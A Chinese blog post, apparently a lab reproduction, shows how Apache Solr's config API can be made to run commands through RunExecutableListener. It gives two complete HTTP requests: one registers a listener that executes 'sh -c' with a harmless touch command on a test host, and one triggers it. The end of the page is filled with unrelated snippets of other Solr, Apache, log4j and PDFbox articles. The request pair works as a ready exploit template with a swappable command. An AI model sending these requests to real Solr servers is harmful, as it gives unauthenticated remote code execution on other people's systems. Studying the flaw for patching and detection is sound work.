Apache Solr - XXE & RCE (2)

Apache Solr - XXE & RCE (2)

0x01 前言

部署那一块请看上一篇文章

https://www.cnblogs.com/0x28/p/12585472.html

0x02 复现

在创建了一个collection为test的基础上调用该collection的config

POST /solr/test/config HTTP/1.1
Host: 192.168.52.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 162

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

触发

POST /solr/test/update HTTP/1.1
Host: 192.168.52.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 19

[{"id":"test"}]

0x03 调试

漏洞位置在于

solr/core/src/java/org/apache/solr/core/RunExecutableListener.java

目前只能跟大部分文章一样跟到这个漏洞点。。。这个调用链实在是太复杂了 ??

先挖个坑,后边再补。

原文地址:https://www.cnblogs.com/0x28/p/12588839.html

时间: 2024-10-08 10:33:20

Apache Solr - XXE & RCE (2)的相关文章

Apache Solr查询语法(转)

查询参数 常用: q - 查询字符串,必须的. fl - 指定返回那些字段内容,用逗号或空格分隔多个. start - 返回第一条记录在完整找到结果中的偏移位置,0开始,一般分页用. rows - 指定返回结果最多有多少条记录,配合start来实现分页. sort - 排序,格式:sort=<field name>+<desc|asc>[,<field name>+<desc|asc>].示例:(inStock desc, price asc)表示先 &qu

Apache Solr初学者教程(入门之旅)

Apache Solr初学者教程(入门之旅) 写在前面:本文涉及solr入门的各方面,请逐行阅读,相信能帮助你对solr有个清晰全面的了解和使用. 在Apache Solr初学者教程的这个例子中,我们将讨论有关如何安装最新版本的Apache Solr,并告诉你如何配置它.此外,我们将告诉你如何进行使用solr的样本数据文件索引.Apache Solr支持不同格式,包括各种数据库,PDF文件,XML文件,CSV文件等等.在这个例子中,我们的索引将研究如何索引数据从一个CSV文件. 我们首选的这个例

Windows下面安装和配置Solr 4.9(一)

   1.Solr下载 下载地址 :http://lucene.apache.org/solr/   2.解压,测试 在example文件夹中找到start.jar文件,用命令提示符运行这个文件:java -jar start.jar,如下图: 8983就是Solr服务器的端口,用浏览器请求http://localhost:8983/solr/网址,打开solr程序管理界面,如下图: 实际上solr使用的是在example\lib目录下面jetty的Web服务器. 停止Solr服务器,在命令提示

Apache Shiro学习笔记(六)FilterChain

鲁春利的工作笔记,好记性不如烂笔头 Apache Shiro学习笔记(七)IniWebEnvironment

apache配置gzip模式(转)

最近在看有关提高website性能的书,个人觉得挺不错的两本书: <<high performance websites>> <<even faster websites>> 觉得还是挺有收获的.其中有一章关于gzip的,就拿apache2.2来实践一下. 要让apache支持gzip功能,要用到deflate_Module和headers_Module.进入apache的配置文件 httpd.conf进行修改. 然后针对这两个module进行一些配置即可:

Solr学习总结(五)Solrnet的基本用法及CURD

上一篇已经讲到了Solr 查询的相关的参数.这里在讲讲C#是如何通过客户端请求和接受solr服务器的数据, 这里推荐使用SolrNet,主要是:SolrNet非常使用方便,而且用户众多,社区活跃,一直在更新. SorlNet源码地址:https://github.com/mausch/SolrNet SolrNet使用说明文档:https://github.com/mausch/SolrNet/tree/master/Documentation 一.创建一个项目控制台程序,并引用SolrNet.

Java:Apache log4j简明教程(一)

Apache log4j的官方介绍是“log4j is a reliable, fast and flexible logging framework (APIs) written in Java, which is distributed under the Apache Software License. log4j is highly configurable through external configuration files at runtime. It views the log

APache PDFbox API使用(1)----简介

由于项目的需要,最近在学习APache  PDFbox API,Apache PDFbox API是Apache Java 开源社区中个一个项目,其受Apache 版权 V2的保护,其提供了下面的功能: (1)文本的提取 即在PDF文件里面把文本内容提取出来. (2) 合并和拆分PDF文档 可以把几个PDF合并成一个PDF文件,也可以把一个PDF文件拆分成多个PDF文件. (3) 表单填充 从PDF文件的表单中提取数据或者写入数据到PDF表单中. (4) PDF/A的校验 根据PDF/A ISO

APache PDFbox API使用(2)----命令行工具的使用

在写具体代码之前,咱们先了解一下Apache PDFbox API框架给我们提供的命令行工具.通过这个命令行工具,我们可以了解大部分 Apache PDFbox给我们提供的强大功能. 在我们运行命令之前,我们首先需要去下载这个命令行工具所依赖的jar文件,大家可以去下面的任何一个站点去下载. http://apache.fayea.com/apache-mirror/pdfbox/1.8.5/pdfbox-app-1.8.5.jar http://mirrors.cnnic.cn/apache/